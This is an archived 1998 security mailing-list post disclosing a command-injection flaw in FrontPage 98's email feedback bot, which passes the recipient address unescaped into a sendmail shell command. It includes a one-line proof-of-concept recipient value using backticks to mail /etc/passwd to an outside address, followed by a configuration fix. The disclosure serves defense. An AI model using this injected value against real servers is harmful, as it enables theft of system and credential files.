On Mon, Oct 12, 1998 at 11:22:38AM -0700, pedwardat_private wrote: > So, here is the status of Frontpage and it's (in)security. Don't know whether this has already been reported. I've noticed another weakness which is still present at least in FP98 with the version id: FPVersion="3.0.2.1330" When installing a server for Frontpage it creates a file (usually) /usr/local/frontpage/www.example.com:80.cnf In order to get the feedback bot working for sending feedback via eMail you can define within this file SendmailCommand:/usr/sbin/sendmail %r The "%r" above is substituted with the recipients email address(es). With this setting you are vulnerable, as creating a feedback page with a recipient address of e.g. `/usr/bin/Mail -s 'password' nobodyat_private < /etc/passwd` will execute the command /usr/sbin/sendmail `/usr/bin/Mail -s 'password' nobodyat_private < /etc/passwd` and send the password file to nobodyat_private To avoid this tell Frontpage to use the SMTP protocol to send emails by using SMTPHost:mail.example.com and you may probably also use MailSender:webmasterat_private \Maex -- SpaceNet GmbH | http://www.Space.Net/ | In a world whithout Research & Development | mailto:researchat_private | walls and fences, Frankfurter Ring 193a | Tel: +49 (89) 32356-0 | who needs D-80807 Muenchen | Fax: +49 (89) 32356-299 | Windows and Gates?
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:19:41 PDT